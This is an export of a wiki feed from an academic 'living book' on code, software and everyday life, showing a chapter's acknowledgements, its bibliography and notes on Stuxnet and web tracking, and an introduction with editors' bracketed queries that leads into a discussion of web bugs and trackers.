intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the interal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that has been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious, for instance Cryptome (2010) argues: It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4709</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4709"/>
		<updated>2012-04-18T14:37:21Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
